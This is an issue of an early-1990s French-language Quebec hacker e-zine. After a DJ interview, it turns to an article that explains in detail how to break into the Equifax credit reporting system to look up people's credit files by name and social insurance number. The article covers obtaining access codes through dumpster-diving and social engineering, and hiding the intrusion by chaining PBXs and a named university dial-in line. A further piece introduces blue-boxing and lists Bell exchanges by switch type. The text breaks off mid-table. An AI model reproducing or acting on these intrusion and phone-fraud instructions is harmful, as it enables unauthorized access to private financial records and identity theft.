...Hummm... En fait, pour tre totalement honnte... J'ai une confession vous faire... L'entrevue proprement dite aurait pu se faire en une heure... mais je prenais BEAUCOUP trop de plaisir couter tous les nouveaux groupes techno-rave que ce maniaque de la musique affectionne, et je suis devenu de plus compltement accro aux mixes GANTS que le sieur Rochette sait seul concocter... Blitz- T'as quoi comme ge, mon mec? Au look, comme a, je te donne 24-25 ans... Daniel- Ha ha! Non! Je suis n le 25 juin 1957! Blitz- Dans un milieu modeste d'o tu t'es sorti la force des poignets, sans doute! Daniel- Tu veux rigoler, Blitz! Je suis originaire de Sainte-Foy, d'un quartier cossu de cette banlieue. Mon pre tait propritaire des cuisines Rochette. Tu connais? Je suis all dans les collges privs, et tout le cirque. Je suis mme entr dans la compagnie de mon pre, avec un titre confortable et tout. Ca a dur 4 ans. J'ai mme t vendeur de l'anne... Blitz- Wow! Que s'est-il pass? Tu t'es fait pincer manger des cretons en cachette, et tu as t renvoy? Daniel- T'es un petit drle, toi! Je savais que c'tait pas moi, ce boulot l. Porter une cravate jusqu' la fin de ma vie... J'ai tout laiss derrire moi, pis j'ai dcid que j'allais maintenant tenter de gagner ma vie en m'amusant, qu'il fallait que j'assume mes responsabilits dans la vie en la gagnant le sourire aux lvres! Blitz- C'est amusant que tu parles de "responsabilits" dans le contexte. Il y a des gens qui diraient justement que c'tait un geste irresponsable. Daniel- Ma vie. Ma peau. J'en fais ce que je veux, et ce que je ne voulais pas, justement, c'est la perdre la gagner. Blitz- Commence ta feuille de route, garon. Daniel- Mille et un mtiers, depuis, pour financer mes "rves". La radio est arrive dans ma vie en 83, et j'ai rapidement ralis que spinner des disques correspondait ce que je voulais faire. Donc, CKRL en 1983, avec une premire mission saveur new-wave et punk, TRANSMISSIONS. Blitz- C'est aussi cette poque que tu t'es mis descendre New-York tous les trois mois pour ramener des piles de galettes de Run-DMC et Grandmaster Flash... Daniel- J'ai effectivement dcouvert le rap cette poque, et j'ai mme t le premier en faire jouer sur les ondes de la radio Qubec. Pour revenir mon exprience CKRL, j'ai particip la premire quinzaine Internationale de la Radiophonie, et j'ai produit et ralis plusieurs missions qui ont t entendues sur les radios communautaires travers le monde. Blitz- Je me souviens que tu avais fait venir THE SOPHIST, un cingl de la musique lectronique que tu avais dcouvert New-York! Daniel- Ouais, le pied! Et puis, avec les dmnagements des locaux de CKRL de l'universit vers la rue Ste-Ursule, j'ai eu de plus en plus d'missions ma charge. LES AUDIENCES DE LA CEBO (Commission d'Enqute sur le Bruit Organis) fut une srie que nous avions ralis ensemble et qui a connu un certain succs. Nous avions un contrat avec le New Music Express de Londres pour diffuser une srie d'une cinquantaine d'entrevues avec des groupes comme Cocteau Twins, Diamanda Galas, Sisters of Mercy, etc... Une deuxime quinzaine internationale de la radiophonie qui a eu un succs boeuf. Et plein de trucs encore... L'mission spciale sur la venue du pape Qubec, tu te souviens? Blitz- J'en ris encore! Et ta vie de DJ hors de CKRL? Daniel- J'ai fait les beaux jours, ou plutt les belles nuits, de l'Ombre Jaune, l'poque. Mes gots musicaux continuaient voluer, et j'ai toujours russi trouver LE son, nouveau et intressant, qui allait former la prochaine vague la mode... Plusieurs autres clubs ont aussi got ma mdecine. Et puis, je me suis dit que a pourrait tre une exprience enrichissante de travailler mon propre compte. Blitz- Et a a pris la forme de...? Daniel- Je me suis mis "manager" quelques groupes de Qubec, et produire des spectacles et des albums. Les PRODUCTIONS DERNIER RECOURS, c'tait moi! J'ai produit le premier album de Hunting Today, par exemple. J'ai organis des tas de shows Qubec, Front 242 deux fois, Chris Isaak au Vieux Port, Ludwig van 88, Les Garons Bouchers, Killing Joke, Dread Zeppelin, Les Bruriers Noirs, etc... Je me suis ruin, financirement, produire de tels spectacles. J'ai perdu quelque chose comme 30 000$ en deux ans. C'est pas rentable, ce genre de truc, si t'es pas un Donald K. Donald. Pis je m'enttais faire venir du stuff que j'aimais, mais qui n'tais pas encore "au got du jour". Toujours la maudite longueur d,avance... Chris Isaak, par exemple, qui est venu par deux fois donner des fichus bons spectacles Qubec, mais c'tait encore AVANT que le film de David Lynch fasse connatre "Wicked game"... Blitz- Tu as aussi possd ton propre club pendant un moment... Daniel- Oui, j'tais co-propritaire du ARTEFAXX, sur la Cte de la Fabrique. Ca avait une gueule d'enfer, mais on a vendu parce que je n'avais pas la bosse de l'administration, et mon collgue non-plus d'ailleurs. On a fait du fric avec la vente, ce qui m'a permis de me lancer dans d'autres avenues. Le Artefaxx est maintenant un restaurant de fruits de mer, le POISSON D'AVRIL, je crois... Blitz- Tu as aussi fait de la performance vido... Daniel- Oui, mais, c'tait vraiment juste un -ct... Avant tout a, il y avait encore la musique, et toutes ces nouvelles sonorits qui me hantaient. J'ai import le son "batcave" alors qu'il n'tait encore qu'une rumeur Londres, et puis... j'ai dcouvert, au cours d'un de mes voyages Amsterdam, les acid houses. Ca m'a clat, cette affaire-l. Je me suis mis explorer, en mme temps que plusieurs petits tripatouilleurs de sons aux quatre coins du monde, sur l'intgration de l'acid music la techno, je me suis mis dvelopper le son "rave". Blitz- Et qu'en as-tu fait? Daniel- je suis depuis quelques temps redevenu un "DJ for hire"... Je ne travaille plus dans une bote en particulier, j'organise plutt, sur demande, des soires rave chez les gens qui en veulent une. Blitz- J'ai attrap une de tes dernires prestations L'Amour Sorcier. Chapeau! Daniel- Que ce soit L'Amour, ou au Bizz, ou la Fourmi Atomik, ou au Bal du Lzard, nomme-les, je les connais tous... Je prfre les partys "privs" organiss par des individus, pour une gang de chums. J'ai parfois des contrats Montral. Rien de mieux qu'une grande salle moche avec un minimum d'quipement, je trouve. La soire est une russite par la seule force de ta musique et de ton animation dans ce temps-l. Blitz- ACiiiiiiiiiiiiiiiiiiiiD! Daniel- Yeah! Blitz- Et si on parlait de la musique elle-mme pour terminer? Parle-moi de la cyber-musik, de la techno, du rave, de l'acid, et des distinctions qu'il faut y faire... Daniel- Toutes les musiques que tu viens de me nommer ont ceci de particulier, par rapport au sonorits plus traditionnelles du rock: avec ces nouveaux sons, tu as 25 ans, au bas mot, de dextrit musicale qui viennent de prendre le bord de la poubelle. Nous sommes passs de l'aptitude physique produire des sons en matrisant un instrument l'aptitude MENTALE concevoir des sons partir de sources sonores dj existantes et que l'on hacke, comme tu dirais, que l'on perverti... Blitz- Je lisais justement une dfinition dans un bouquin l'autre jour [NdE: Storming the reality studio: A casebook of cyberpunk and PostModern Science fiction, par Larry McCaffery], une dfinition intressante de la cybermusik: feeding the noise back into the system. Ralimenter le bruit dans le systme qui l'a gnr. Comme Ensturzende Nbaten, par exemple, qui reprend les sons "industriels", les scies, les marteaux-piqueurs, les sons d'une socit industrielle, pour les retourner dans les oreilles de cette socit, compltement harmoniss, au niveau du concept. Daniel- C'est pas ncessairement une approche ludique trs novatrice, car un groupe comme Kraftwerk, par exemple, dmontrait depuis des annes que l'aptitude programmer des sons et des squences pouvait prendre le pas sur l'expertise manuelle d'un instrument. Sauf que, maintenant, le synthtiseur-chantillonneur est un instrument part entire de tout groupe qui se respecte, et la construction, l'chafaudage d'un phras musical englob dans son entiret par ces instruments est le propre d'une multitude de hacker-musiciens. Front 242, Test Departement, Future Sound Of London, Ministry, etc... Je ne dis pas que tous ces groupes forment la totalit de ce qui devrait tre couvert par ce terme de "cybermusik", mais c'est une des avenues les plus dansantes, tout le moins. Blitz- Je suis all ta dernire soire rave, et j'ai remarqu que le beat d'enfer qui meut toutes ces jambes et ces corps sur la piste de danse n'est pas sans me rappeler, malheureusement, la disco des annes 70. Daniel- Et pourtant, pour l'oreille avertie, les pulsations par minute ont augment au fil des annes. Par exemple, le disco pousait un rythme de 120 beat/minute. La musique rave la plus violente pousse maintenant des pointes jusqu' 200 b/m... La moyenne des productions techo et acid se situe autour de 160 180 b/m. Blitz- Et pour les amateurs du genre, quels sont les groupes que nous devrions surveiller? Daniel- Je vais faire mieux que a, Blitz. A compter de ce mois-ci, je vais vous offrir de publier dans NPC un top five des meilleurs groupes de rave/techno/house. Blitz- Ca va te prendre un handle si tu veux crire pour nous! Daniel- Pas de problme... GENGIS DAN, a te va? Blitz- Ouais, super! Dankechein, Daniel! Daniel- Merci NPC! ---------------------- TOP 5 AMBIENT/TECHNO Groupe/celllule Titre chanson Titre album # tiquette 1-United Frequen- Gemini 6 U.F.O.T MFS-7027-2 cies Of Trance Vol. 2 2-Electric Music Intercomix Crosstalk SPV-056- 110363 3-Polygon Window If it really Surfing on WARP CD-7 isn't me sine waves 4-The Future Papua New Accelerator Jumpin and Sound of Guinea Pumpin CD- London TOT-2 5-Forgotten Echoes 3000 OHM! Suck CD3 Worlds (compilation) -------------- Co0l Dude. Si vous dsirez organiser des soires rave pour votre cole, votre bureau, l'enterrement de votre poddle, n'hsitez pas contacter Daniel au 418-694-1104. Dites-lui que c'est NPC qui vous envoie, et il vous fera un prix d'ami! Daniel a profit de l'occasion pour crer un super-mix NPC qui va jouer dans ses prochaines soires. Un de vos copains a peut-tre dj la cassette entre les mains. Nous allons en sampler un extrait pour faire un .VOC que vous pourrez trouver, tout fait gratuitement, sur les boards NPC de Qubec. On pourrait pas vous mettre tout le mix au complet, malheureusement, sinon a ferait 20 megs... En passant, il y a aussi un .GIF NPC sur ces boards, une oeuvre originale, inspire du mouvement constructiviste russe de l'entre-deux guerres. Cette peinture a t ralise par un artiste originaire de la rgion 418, Louis Rmillard. M. Rmillard a un portfolio trs intressant: ses lithographies et estampes sont exposes aussi bien au Japon qu' Berlin, et, plus proche de nous, le Muse du Qubec s'est port acqureur de quelques unes de ses oeuvres pour sa collection permanente. Lorsqu'il n'excute pas des commandes spciales pour NPC, le travail de M. Rmillard rflte une proccupation indniable pour la ville et ses travers. Nous vous tiendrons informs des lieux et dates de la prochaine exposition solo du sieur Rmillard sur son sol natal, a va vous brancher, j'en suis certain... Le GIF, le VOC, il ne nous reste plus qu' organiser le NPC World Tour: une tourne de tous les pnitenciers fdraux de la province, peut-tre? NOUS DEVELOPPONS POUR VOUS LES TELEPHONES DU FUTURS "CLASSEZ LE DANS LE REGISTRE DES DCDS!" "OUAIS CHEF!" QUIFAX Par AtrEiD BeVaTRoN Beaucoup de gens croient la vie prive. Beaucoup de gens croient que le concept de vie prive est sacr. Beaucoup de gens croient qu'ils ont droit une deuxime chance. Beaucoup de gens croient que le fait qu'ils aient pay cinq fois leur compte de Bell en retard ne changera rien leur vie et leur marge de crdit. Beaucoup de gens croient qu'ils sont libres. Ils se trompent, vous vous trompez, ON EST TOUS DANS L'ERREUR PUTAIN DE MERDE!!! Pourquoi? Parce que moi, comme vous et comme TOUS les autres, nous sommes fichs, enchans dans l'engrenage que constitue le systme. Je porte un numro de srie, comme vous tous, et n'importe quel imbcile de presque n'importe o peut s'informer de ma sant, mes prestations d'assurance-chmage, ma marge de crdit. C'EST IMPOSSIBLE VOYONS!!! C'EST CONTRE LA VIE PRIVE!!! Vous tes bien naf... En effet, je n'ai moi-mme, croyez-le o non, qu' composer un simple bordel de numro de tlphone, par modem, et me voil entr! Simple vous entends-je dire? TROP simple! Si simple que des tas de personnes ne voient rien d'immoral dans le fait d'aller consulter votre dossier, quand bon leur semble. Des fonctionnaires vreux vendent vos informations certains autres fonctionnaires encore plus vreux, qui eux, comme par hasard, oublieront votre dossier sur le coin de leur bureau, dossier qui se fera ramasser par une quelconque personne qui, encore par hasard, dsirait justement, par hasard, effectuer une enqute sur vous pour savoir si vous avez dj fraud l'assurance-chmage. Moi, j'appelle a une NORME coincidence!!! Et savez-vous ce qui est le plus injuste l-dedans? Le plus injuste, c'est que si vous appelez vous-mme QUIFAX CANADA pour leur demander les infos sur VOTRE PROPRE DOSSIER, ils vous rpondront que ces informations sont CONFIDENTIELLES!! Attendez un peu, je suis curieux : CONFIDENTIEL : Se dit de ce qui est dclar en secret quelqu'un. Autrement dit, Equifax devrait, en principe, possder des informations secrtes? Hey merde! Voici un exemple de ce qu'il y a de secret dans votre dossier: J'ai souvent entendu parler (et j'en connais d'ailleurs certains qui sont impliqus), de personnes places devant un certain problme, soit qu'ils sont dans l'impossibilit TOTALE de se trouver un logement. Simple, ils sont malpropres et non-civiliss! NON! Ils sont humains et sont comme vous et moi! Alors, comment expliquez-vous a? Simple! J'explique a par le seul fait que, pendant une priode d'environ trois mois chacune, ces personnes ne sont pas arrives boucler leur budget comme il le fallait. Ce qui veut dire qu'ils ont eu beaucoup de retard en rglant leur facture de logement. Rsultat: Les informations de ces mmes personnes ont t communiques, par les proprios eux-mmes, la Rgie du logement. La Rgie du logement s'est alors EMPRESSE d'inscrire une note disant que ces personnes prouvaient certains problmes financiers, et qu'ils constituaient donc une clientle risque pour les propritaires. Alors pour enchaner, lorsqu'une de ces personnes se cherche un logement, le propritaire appelle la Rgie, demande certaines informations sur ces personnes, et se fait rpondre qu'il y a des risques... Que croyez-vous qu'il fait? Il s'empresse lui-aussi de jeter le nom et le numro de tlphone de la personne en question dans les poubelles, et lui dit qu'il la rappellera... Vous imaginez la suite... Tout ce que je veux dire, c'est que la vie prive, OUBLIEZ A!!! Tout ce que je veux dire, c'est que votre deuxime chance, OUBLIEZ- LA!!! Tout ce que je veux dire, c'est que la LIBERT, c'est une belle connerie!! Vous tes inscrits quelque part et votre dossier n'attend que de se faire cueillir dans l'arbre florissant des informations CONFIDENTIELLES! Quoi faire dites-vous? Pas grand chose, mais... Ne restez pas esclaves comme ils le veulent! Ne restez pas passifs comme ils le dsirent! AGISSEZ! Comment?, dites-vous de nouveau. C'est ce que je me suis pos comme question, et j'ai pris les moyens pour arriver pntrer leur systme la con... Et j'y suis arriv! Ce texte vous expliquera EN DTAIL comment vous pouvez, vous-mme, vous procurer un code valide sur le systme et comment vous en servir... Certains diront que cela est ILLGAL!! Que pensez-vous alors de la faon dont agit cette merde de gouvernement? Vous tes d'accord sur le fait que presque n'importe quel imbcile de fonctionnaire peut avoir accs vos dossiers? Vous trouvez normal que presque n'importe qui, en fait, puissent admirer votre dossier mdical? Alors vous n'tes qu'un esclave! Un de ces loosers que les gens aiment appeler : les passifs, les bons citoyens... Ce texte n'est pas pour vous. Passons maintenant la pratique, sinon on va dire que je suis subversif, sditieux et autres choses du genre... ;-) Premirement, pour entrer dans le rseau quifax, vous aurez besoin du programme ncessaire, communement nomm un TERM. Le TERM en question est mieux connu sous le nom de C.I.S. (Credit Information System) de son abrviation. Certains qui ont dj pntr le systme viendront peut-tre me dire que c'est possible sans le TERM, mais encore l, je ne le crois pas... Le term envoie des sries de lettres et de chiffres, chaque commande correspondant une srie de lettres. Le term est d'ailleurs ce que j'ai toujours utilis, n'oublions pas qu'il se DOIT d'tre simple, car en fait, les utilisateurs les plus frquents sont probablement des personnes qui savent peine comment manipuler un ordinateur. O se procurer le C.I.S.? Malheureusement, j'ai le regret de vous dire que joindre ce programme dans l'archive de NPC serait illgal! Pourquoi? Non pas pour la raison de ce quoi le programme servirait, mais simplement parce que le programme de Term est Copyright. O se le procurer alors? Simple! Dans tout bon bbs pirate, H/P ou autre, que ce soit Qubec ou ailleurs comme Montral ou Hull. Je n'ai toutefois jamais essay d'entrer sur un systme de crdit amricain, je veux dire par une node amricaine, je ne peux donc pas vous dire si le programme fonctionne pour CBI, mais je peux le prsumer, tant donn que CBI n'est en fait que la version amricaine de quifax. En effet, les deux systmes sont de mme souche. Je vous entends dj dire que vous ne serez pas capable de trouver le numro. Vous avez peut-tre raison! ;-) TOUTEFOIS, nous NPCiens, nous assurerons d'une chose lors de la distribution du logiciel C.I.S.. Nous nous assurerons qu'un petit fichier du nom de NUMBERS.!!! soit intgr dans l'archive. Ce fichier contiendra le, ou les numros connus avec lesquels vous pouvez communiquer avec le systme quifax par modem. Nous avons beaucoup hsit entre le choix d'inclure le numro d'accs de Qubec, dans le journal, mais tant donn qu' notre connaissance, C.I.S. n'a jamais t distribu, nous nous assurerons qu'il le soit convenablement, avec ce numro. En d'autres mots, le numro et le logiciel sont deux choses indissociables. LA CONFIGURATION DE C.I.S.: Vous lisez NPC en ce moment et vous avez probablement appel quelques part, par modem, pour l'avoir. Vous connaissez donc les bases de la configuration d'un programme de communication. Ce programme ne fait pas exception la rgle. Il est trs simple configurer. La doc de Telemate devrait carrment faire l'affaire... Toutefois, si le besoin ou la demande se fait ressentir, je me ferai plaisir d'inclure la doc INTGRALE dans le NPC#5, chose que je ne fais pas maintenant pour la seule raison nous voulons savoir si le sujet intresse les gens, mme si nous nous en doutons, avant de nous lancer dans les explications compliques et dtailles. Ce texte peut donc tre vu comme une introduction, un Quick-Start au rseau QUIFAX... LE LOGON: Lui aussi est assez simple. Vous n'aurez besoin que de votre USER ID, et de votre password correspondant. Je vous dcrirai plus loin comment vous en procurer. Voici quoi faire une fois que vous serez connect: 1- Appuyez seulement sur . et appuyez sur ENTER. 2- Vous verrez apparatre l'cran: DATABASE INFORMATION SERVICE YOUR USER ID PLEASE: 3- Vous tapez ensuite votre numro d'usager et vous appuyez sur ENTER. 4- Vous verrez apparatre l'cran: PASSWORD 5- Vous entrez votre password et appuyez sur ENTER. 6- Vous verrez apparatre l'cran: PROCEED Une fois entr, vous devrez indiquer au systme votre destination, c'est--dire quel service vous dsirez utiliser. Voii ce que vous aurez l'cran: Ŀ ** C.I.S. ** SIGN ON MENU -------------- FACILITY................._________ PASSWORD................._________ Le terme FACILITY reprsente le service dans lequel vous dsirez entrer et le PASSWORD est le mot de passe que vous pourrez vous procurer avec un peu de Social Engineering avec une station de tlvision. Le Social Engineering semble tre un don acquis pour nous tous, NPCiens, phreakers, hackers, mais il en est peut-tre d'un tout autre cas pour vous qui lisez cette article, qui tes peut-tre des non-initis. Dans ce cas, je vous convie lire NPC#5 dans lequel j'crirai un article sur les principes de base du Social Engineering. Voici la liste des services dans lesquels vous pouvez vous diriger: CONSUMER REPORTING..................: CONS COMMERCIAL REPORTING................: COMM ADDITIONAL COMMUNICATION FACILITIES.: ACF COLLECTIONS.........................: COLL Je vais d'ailleurs rserver ce texte la partie CONSUMER REPORTING, et ferai un complment, une suite ce texte qui aura en fait deux parties. La partie CONSUMER REPORTING concerne les gens comme vous et moi, les gens qui subissent cette merde d'injustice. BON! Vous avez entr le FACILITY et le bon PASSWORD correspondant, voil ce que vous verrez apparatre l'cran: Ŀ ** C.I.S. ** C R E D I T B U R E A U M E N U ------------------------------------- 1. Credit bureau reporting online access 2. Credit bureau reporting batch access 3. Save inquiries on disk 4. 5. Clear all inquiries 6. Quit Select Option Number Return Option 1 - Credit bureau reporting online access : Voici ce que vous lirez et devrez remplir. Certains espaces ne sont pas ncssaires pour donner les coordonnes de recherche, d'autres sont OBLIGATOIRES, comme le Billing Code et la Date du jour... Les "blancs" que vous devez remplir dans cette page sont les keywords qui fera chercher leur ordinateur, pour trouver la personne que vous recherchez. Ŀ *** SUBJECT DATA ENTRY *** Network:__ File:__ Billing:__ Client:________ Date: __/__/__ **SUBJECT** Last Name...:________________ First Name..:________________ Suffix:__ Middle Name.:________________ Sp.First Name:__________ Sp.Last Name:________________ **CURRENT ADDRESS** **FORMER ADDRESS** Street No:__________ Street No:____________ Street Name:____________ Street Name:__________ Street type:____________ Street type:__________ City:________ Appartment:___ City:_________ Appartment:___ Province:__ Postal Code:______ Province:__ Postal Code:_______ **EMPLOYMENT** Occ:__________________________ Emp:___________________________ **IDENTIFICATION** Subject.. DB: __/__/__ AGE:___ SSS:___-___-___ Spouse.. DB: __/__/__ SSC:___-___-___ F1 Send F2 Add FK F3 Review F6 Delete Inq F9 Redial ESC Voici les significations des paramtres les moins vidents: NETWORK: Il peut tre compos d'une des deux lettres existantes. A - ACRO (quifax Network) C - CBI (CBI Network - USA) FILE : Indique le type de fichier demander. I - Individual File : Uniquement le fichier de la personne en question sera demand. J - Joint File : Les fichiers de la personne demande ET de son pouse ou poux. M - Military File : Disponible seulement du rseau CBI. Non valable pour quifax. S - Segmented File : Indique que vous ne dsirez que la partie du dossier relevant de l'identit de la personne. (Nom, addresse, date de naissance, numro d'assurance sociale, profession) BILLING CODE : Un PETIT code d'accs qui vient normalement avec le programme. Il doit tre inscrit pour continuer entrer les coordonnes de recherche. Il existe environ 50 codes d'accs travers le rseau quifax. CLIENT : Cette partie apparat automatiquement aprs l'inscription du Billing Code... DATE : Vous DEVEZ inscrire la date. Simple, c'est la date du jour o vous tes!! SUFFIX : Sr, Jr, 1, 2, 3, Dr, Rv. SP.xxxx NAME : Sp veut dire SPOUSE, soit poux ou pouse. SSS : Numro d'assurance sociale de la personne en question. SSC : Numro d'assurance sociale de l'pouse ou poux de la personne. Voici la liste des paramtres OPTIONNELS et ceux OBLIGATOIRES entrer dans le rpertoire de recherche: OPTIONEL = P OBLIGATOIRE = B NETWORK = B LAST NAME = B FIRST NAME = B SUFFIX = P MIDDLE NAME = P SP.FIRST NAME = B SP.LAST NAME = P STREET NUMBER = P STREET NAME = P STREET TYPE = P APARTMENT # = P CITY = B PROVINCE,STATE = B POSTAL CODE = P EMPLOYMENT = P AGE = P SSS = P SSC = P BIRTH (DB) = P Une fois que tous les paramtres de recherche requis sont entrs, simplement appuyez sur F1 (send) et les INFOS seront automatiquement affiches l'cran. Je ne m'attarderai que sur l'option 1, car les autres options comme Credit Bureau Reporting Batch Access concernent surtout les vritables utilisateurs. En effet, pour l'utilisation que nous et vous dsirons en faire, l'option 1 sera amplement suffisante! Et voil pour la partie de l'entre. Voici quelques notes diverses maintenant, comme O TROUVER DES FOUTUS CODES D'ACCS?!? Les codes d'accs: J'espre que vous n'avez pas peur de vous salir, car vous devrez vraiment ne pas hsiter. Vous devrez aller trasher! Et pas dans les poubelles du Bell cette fois, mais bien dans les poubelles d'UN CONCESSIONNAIRE AUTOMOBILE! Ceci peut sembler assez ridicule premire vue, mais o pouvez-vous dpenser le plus d'argent en un laps de temps incroyablement court? Chez un concessionnaire automobile. C'est pourquoi les vendeurs possdent en gnral tous un code, si bien que quifax est utilis trs rgulirement par eux, puisqu'ils doivent savoir si les acheteurs sont des placements srs. D'autres faons? Bien sr! Il y a le Social Engineering par exemple. Ce qui veut dire que vous devez utiliser votre belle voix! Voici quelques endroits o utiliser votre imagination: Les stations de tlvision et de radio, les concessionnaires automobiles, les banques, certains bijoutiers. Enfin vous voyez le genre? Tout ce qui cote beaucoup d'argent! Le danger d'utilisation frauduleuse: Je n'aime pas beaucoup le terme FRAUDULEUX... Je trouve que ce systme en entier devrait tre dclar FRAUDULEUX mon avis, mais puisqu'il faut appeler les choses par leur nom, employons les bons termes! Vous avez lu le texte sur les PBXs dans NPC #1? LISEZ-LE! Enfin si vous n'y connaissez rien, parce que quifax, CBI, TRW et tous les autres rseaux de renseignements de crdits sont trs dangereux. Ce qui veut dire? Ce qui veut simplement dire que si on vous surprend, vous pouvez presque dire adieu votre dossier judiciaire! Il ne faut videmment pas exagrer, mais soyez prudent! COMMENT? 1- 418-656-7700 vous connaissez? C'est dj mieux que d'appeler de chez vous. Il sagit du numro de tlphone du rseau de l'Universit Laval. Avec a, vous vous connectez, faites -=-=-=-=-= jusqu'au BIP, et partir de l, faites E pour Externe. Ils vous demanderont le numro de votre point d'arrive, tapez simplement le numro de quifax. 2- Mme avant d'appeler l'universit, prenez la peine de passer par un ou mme 2 PBX, diverters ou Out-Dials de VMB. Personnellement, lorsque je veux entrer dans le rseau, je prends BEAUCOUP de prcautions: J'appelle un OUT-DIAL DE VMB. De l, j'appelle un PBX amricain 800. De l, je contacte un Decserver 800 amricain. De l, j'appelle un UNIX de qubec avec lequel je peux out-dialer et de l, j'appelle l'Universit Laval. Je rappelle l'Universit Laval 2-3 fois partir de l'Universit Laval (je fais une loop) et de l, j'appelle enfin quifax! Simple hein? ;-) Toutefois, je rserve cela pour mes sessions de trs longues dure. Si vous ne dsirez faire qu'une seule requte, ne faites que passer d'un PBX 800 l'Universit Laval et de l, vous pouvez appeler quifax sans problme.... Voil pour cet article, crit un peu rapidement je l'avoue, puisqu'il ne s'agissait que d'une introduction! (Une intro de 8 pages! Pouha!) Je n'ai parl que de la partie CONSUMER. Je parlerai dans le prochain numro de la partie COMMERCIALE, enfin si la demande est interessante. Le rseau quifax en est un trs complexe, trs grand, et il vaut vraiment la peine d'tre entr au moins une seule fois dans la vie d'un hacker... Lorsque j'y entre, je constate quel point ils se foutent tous de la vie prive! Ca me dgoute! Je tiens rajouter que nous-mme, de NPC, n'avons jamais, JUSQU' MAINTENANT, t tents d'aller jouer dans les dossiers de crdit des ennemis de NPC... LES FACTURES ROUGES, C'EST POUR LE TEMPS DES FETES QUAND LES BLUE-BOX PARCOURAIENT LA TERRE... par Blitzkreig " -Is it safe? -What? -I said: Is it safe?" -Marathon Man Un de nos lecteurs d'Asbestos, -668, Satan's Neighbor-, nous crit pour nous demander si la "bonne vieille poque" des blue-boxes tait vraiment termine. Il se plaignait du fait qu'il avait t trop jeune l'poque de l'utilisation florissante des boxes, et qu'il regrettait de ne pas avoir connu cette priode apparemment fantastique. J'ai les mmes regrets propos de Woodstock et de la gnration hippie: tout ce bon acide que je n'ai jamais got... Non, Neighbor, le blue box n'est pas tout fait mort. Il se porte encore trs bien dans plusieurs parties du monde, comme au Portugal, par exemple. Mais l'arrive de systmes de plus en plus perfectionns dans les centrales des fonecos augmente le risque de dtection du dsormais clbre 2600 Mhz... Les ESS et DMS, par exemple, vont te spotter en moins de temps qu'il n'en faut pour crier "Je dbute, mais j'ai des tones"... Ce problme pos, il faut maintenant prciser que le Bell n'a pas install des ESS dans tous ses CO, loin de l. Il y a encore des endroits, au Qubec, o le B.B. est encore autre chose qu'un groupe de chanteurs pour midinettes. Northern Phun Co, ne reculant devant rien (surtout qu'il n'y a rien en avant de nous!), publie aujourd'hui, en exclusivit MONDIALE, la liste COMPLETE des diffrents bureaux du Bell avec chacuns des sytmes installs. Y! Il est a noter que le nom gauche indique le nom du CO, et non de la ville. Bien sr, dans 98% des cas, les deux correspondent. Mais dans d'autres... Ainsi, les deux bureaux Qubec, St-Cyrille d'Aiguillon, sont identifis comme tels, et non pas dans "Qubec". En cas de doute, vrifiez l'indicatif (NNX) pour voir s'il correspond au votre. QUIPEMENT DE CENTRAL - LEXIQUE NNX Indicatif de central P-A-P Central pas pas 5XB Bureau crossbar #5 ESS Systme de commutation lectronique #1 SP1 Systme de commutation lectronique SP1 N5-1 Crossbar N5-1 N5-2 Crossbar N5-2 SA-1 Crossbar SA-1 NJ-92 Radio-tlphone de circonscription DMS 10 Autocommutateur DMS 10 DMS 100 Autocommutateur DMS 100 Ericson Crossbar Ericson LAMA Comptabilit automatique locale des appels RLM Unit de raccordement distant CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 AEROPORT BAGOTVILLE 677 x ALBANEL 279 x ALMA 662-8-9 x ANCIENNE LORETTE 871-2-4-7 x ANSE ST-JEAN 272 x BAIE STE-CATHERINE 237 x BAIE ST-PAUL 435 x BEAUPORT 661-3-4 x BEAUPORT 660-6-7 x BERGERONNES 232 x BIENCOURT 499 x BLACK LAKE 423 x BOISCHATEL 822 x CABANO 854 x CHAMBORD 342 x CHARLESBOURG 621-2-3-4-6-7-8-890-976 LAMA CHARNY 832 x CHICOUTIMI 545-9-690-3-8 LAMA CHICOUTIMI 543-5-6 x CHUTE DES PASSES 377 x CLERMONT 439 x D'AIGUILLON 692-4 LAMA DESBIENS DELISLE 347 x DOLBEAU 276 x EAST BROUGHTON 427 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 ESCOUMINS 233 x FERLAND 676 x GARTHBY 458 x GIRARDVILLE 258 x HEBERTVILLE 343-4 x ILE AUX COUDRES 438 x INVERNESS 453 x JONQUIERE-MELLON 548 x JONQUIERE-ST-JACQUE 542-7-695 x LA BAIE 544-697 x LAC BOUCHETTE 348 x LA DORE 256 x LA MALBAIE 665 x LA POCATIERE 856 x LATERRIERE 678 x LEEDS 424 x LES EBOULEMENTS 635 x LEVIS 833-5-7-8 x L'ISLE VERT 898 x LORETTEVILLE 842-3-5-7 x AKULIVIK 496 x ARUNDEL 687 x ASBESTOS 879 x AUPALUK 491 x x AYER'S CLIFF 838 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 AYLMER 684-5 x AYLMER 682 x BAKER LAKE 793 x BISHOPTON 884 x BOUCHETTE 465 x BROMPTONVILLE 846 x BUCKINGHAM 986 x BUCKINGHAM 281 x BURY 872 x CHAMPLAIN 295 x CHAPEAU 689 x CHARTIERVILLE 656 x CHELSEA 827 x COATICOOK 849 x COMPTON 835 x COOKSHIRE 875 x DANVILLE 839 x DEAUVILLE 864 x DESCHAILLONS 292 x DRUMMONDVILLE 472-5-8 LAMA DRUMMONDVILLE 474-7 x EAST ANGUS 832 x EAST HEREFORD 644 x FORT COULONGE 683 x FORTIERVILLE 287 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 GATINEAU 643-663-9 LAMA GRACEFIELD 463 x GRAND MERE 533-8 x GRAND REMOUS 438 x HULL 770-1-6-7 x HULL 595-770-2-3-953-994-7 LAMA HULL 775-956-976 LAMA INUKJIAK 254 x IVUJIVIK 922 x KANGIQSUALUJJUAQ 337 PBX 711 KANGIQSUJUAK 338 PBX 711 KANGIRSUK 935 x KAZABAZUA 467 x KUUJJUAQ 964 x LABELLE 686 x LAC DROLET 549 x LAC MEGANTIC 583 x LA MINERVE 274 x L'ANNONCIATION 275 x LA PATRIE 888 x LAURIERVILLE 365 x L'AVENIR 394 x LOUISEVILLE 228 x LOW 422 x LONGUEIL-RTH 468-647 x CENTRAL NNX P 5 E S D N N S N D - X S P M 5 5 A J M A B S 1 S - - - 9 S - 10 1 2 1 2 100 LONGUEIL-RTH 